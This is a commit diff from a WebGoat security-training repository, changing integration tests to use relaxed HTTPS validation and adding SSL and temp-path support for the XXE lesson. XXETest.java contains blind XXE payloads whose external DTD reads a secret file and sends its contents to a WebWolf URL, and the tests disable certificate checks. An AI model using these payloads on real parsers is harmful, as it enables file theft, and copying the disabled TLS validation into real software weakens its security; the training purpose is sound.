dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

xxe path info (#670)

Browse Source 
* xxe path info aid added

* xxe path info aid added

*  changes to template file and hints

* added ssl test support for XXE

* added ssl test support for XXE

* restconfig replaced by httpsrelaxed

* processed review comments on hints and example
This commit is contained in:
René Zubcevic
2019-10-02 09:59:32 +02:00
committed by GitHub
parent 7536770769
commit 663224d06a
13 changed files with 152 additions and 52 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
webgoat-integration-tests/src/test/java/org/owasp/webgoat/GeneralLessonTest.java
View File

@ -39,7 +39,7 @@ public class GeneralLessonTest extends IntegrationTest {
public void httpProxies() {
startLesson("HttpProxies");
Assert.assertThat(RestAssured.given()
.when().config(restConfig).cookie("JSESSIONID", getWebGoatCookie()).header("x-request-intercepted", "true")
.when().relaxedHTTPSValidation().cookie("JSESSIONID", getWebGoatCookie()).header("x-request-intercepted", "true")
.contentType(ContentType.JSON)
.get(url("HttpProxies/intercept-request?changeMe=Requests are tampered easily"))
.then()
@ -82,7 +82,7 @@ public class GeneralLessonTest extends IntegrationTest {
checkResults("/auth-bypass/");
startLesson("HttpProxies");
Assert.assertThat(RestAssured.given().when().config(restConfig).cookie("JSESSIONID", getWebGoatCookie()).header("x-request-intercepted", "true")
Assert.assertThat(RestAssured.given().when().relaxedHTTPSValidation().cookie("JSESSIONID", getWebGoatCookie()).header("x-request-intercepted", "true")
.contentType(ContentType.JSON)
.get(url("/WebGoat/HttpProxies/intercept-request?changeMe=Requests are tampered easily")).then()
.statusCode(200).extract().path("lessonCompleted"), CoreMatchers.is(true));
@ -101,7 +101,7 @@ public class GeneralLessonTest extends IntegrationTest {
String result =
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("webgoat-requested-by", "dom-xss-vuln")
.header("X-Requested-With", "XMLHttpRequest")

40
webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
View File

@ -22,14 +22,15 @@ import static io.restassured.RestAssured.given;
public abstract class IntegrationTest {
protected static int WG_PORT = 8080;
protected static int WG_PORT = 8843;
protected static int WW_PORT = 9090;
private static String WEBGOAT_URL = "http://127.0.0.1:" + WG_PORT + "/WebGoat/";
private static String WEBWOLF_URL = "http://127.0.0.1:" + WW_PORT + "/";
private static boolean WG_SSL = false;//enable this if you want to run the test on ssl
//This also allows to test the application with HTTPS when outside testing option is used
//TODO no longer required but will be removed once all usages are removed
protected static RestAssuredConfig restConfig = RestAssuredConfig.newConfig().sslConfig(new SSLConfig().relaxedHTTPSValidation());
@Getter
private String webGoatCookie;
@Getter
@ -41,12 +42,16 @@ public abstract class IntegrationTest {
@BeforeClass
public static void beforeAll() {
if (WG_SSL) {
WEBGOAT_URL = WEBGOAT_URL.replace("http:","https:");
}
if (!started) {
started = true;
if (!isAlreadyRunning(WG_PORT)) {
SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class)
.properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_PORT", WG_PORT));
.properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_SSLENABLED", WG_SSL, "WEBGOAT_PORT", WG_PORT));
wgs.run();
}
@ -80,9 +85,10 @@ public abstract class IntegrationTest {
@Before
public void login() {
String location = given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.formParam("username", webgoatUser)
.formParam("password", "password")
.post(url("login")).then()
@ -92,7 +98,7 @@ public abstract class IntegrationTest {
if (location.endsWith("?error")) {
webGoatCookie = RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.formParam("username", webgoatUser)
.formParam("password", "password")
.formParam("matchingPassword", "password")
@ -106,7 +112,7 @@ public abstract class IntegrationTest {
} else {
webGoatCookie = given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.formParam("username", webgoatUser)
.formParam("password", "password")
.post(url("login")).then()
@ -117,7 +123,7 @@ public abstract class IntegrationTest {
webWolfCookie = RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.formParam("username", webgoatUser)
.formParam("password", "password")
.post(WEBWOLF_URL + "login")
@ -132,7 +138,7 @@ public abstract class IntegrationTest {
public void logout() {
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.get(url("logout"))
.then()
.statusCode(200);
@ -146,7 +152,7 @@ public abstract class IntegrationTest {
public void startLesson(String lessonName) {
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url(lessonName + ".lesson.lesson"))
.then()
@ -154,7 +160,7 @@ public abstract class IntegrationTest {
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/restartlesson.mvc"))
.then()
@ -174,7 +180,7 @@ public abstract class IntegrationTest {
Assert.assertThat(
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.post(url)
@ -196,7 +202,7 @@ public abstract class IntegrationTest {
Assert.assertThat(
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.put(url)
@ -208,7 +214,7 @@ public abstract class IntegrationTest {
public void checkResults(String prefix) {
Assert.assertThat(RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/lessonoverview.mvc"))
.then()
@ -216,7 +222,7 @@ public abstract class IntegrationTest {
Assert.assertThat(RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/lessonoverview.mvc"))
.then()
@ -228,7 +234,7 @@ public abstract class IntegrationTest {
Assert.assertThat(
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.contentType(contentType)
.cookie("JSESSIONID", getWebGoatCookie())
.body(body)

8
webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
View File

@ -76,7 +76,7 @@ public class JWTLessonTest extends IntegrationTest {
String accessToken = RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("/WebGoat/JWT/secret/gettoken"))
.then()
@ -87,7 +87,7 @@ public class JWTLessonTest extends IntegrationTest {
Assert.assertThat(
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParam("token", generateToken(secret))
.post(url("/WebGoat/JWT/secret"))
@ -101,7 +101,7 @@ public class JWTLessonTest extends IntegrationTest {
private void resetVotes() throws IOException {
String accessToken = RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("/WebGoat/JWT/votings/login?user=Tom"))
.then()
@ -128,7 +128,7 @@ public class JWTLessonTest extends IntegrationTest {
Assert.assertThat(
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.cookie("access_token", replacedToken)
.post(url("/WebGoat/JWT/votings"))

8
webgoat-integration-tests/src/test/java/org/owasp/webgoat/PasswordResetLessonTest.java
View File

@ -29,7 +29,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
var responseBody = RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(webWolfUrl("/WebWolf/mail"))
.then()
@ -41,7 +41,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
private void changePassword(String link) {
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams("resetLink", link, "password", "123456")
.post(url("PasswordReset/reset/change-password"))
@ -52,7 +52,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
private String getPasswordResetLinkFromLandingPage() {
var responseBody = RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(webWolfUrl("WebWolf/requests"))
.then()
@ -66,7 +66,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
RestAssured.given()
.when()
.header("host", "localhost:9090")
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams("email", user)
.post(url("PasswordReset/ForgotPassword/create-password-reset-link"))

39
webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
View File

@ -17,14 +17,17 @@ public class XXETest extends IntegrationTest {
private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file:SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>\">%all;";
private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
private String webwolfFileDir = System.getProperty("user.dir").concat("/target/webwolf-fileserver");
private String webGoatHomeDirectory;
private String webwolfFileDir;
@Test
public void runTests() throws IOException {
startLesson("XXE");
webGoatHomeDirectory = getWebGoatServerPath();
webwolfFileDir = getWebWolfServerPath();
checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
@ -55,7 +58,7 @@ public class XXETest extends IntegrationTest {
//upload DTD
RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.multiPart("file", "blind.dtd", dtd7String.getBytes())
.post(webWolfUrl("/WebWolf/fileupload"))
@ -69,7 +72,7 @@ public class XXETest extends IntegrationTest {
//read results from WebWolf
String result = RestAssured.given()
.when()
.config(restConfig)
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(webWolfUrl("/WebWolf/requests"))
.then()
@ -79,4 +82,32 @@ public class XXETest extends IntegrationTest {
return result;
}
private String getWebGoatServerPath() throws IOException {
//read path from server
String result = RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("/WebGoat/xxe/tmpdir"))
.then()
.extract().response().getBody().asString();
result = result.replace("%20", " ");
return result;
}
private String getWebWolfServerPath() throws IOException {
//read path from server
String result = RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(webWolfUrl("/tmpdir"))
.then()
.extract().response().getBody().asString();
result = result.replace("%20", " ");
return result;
}
}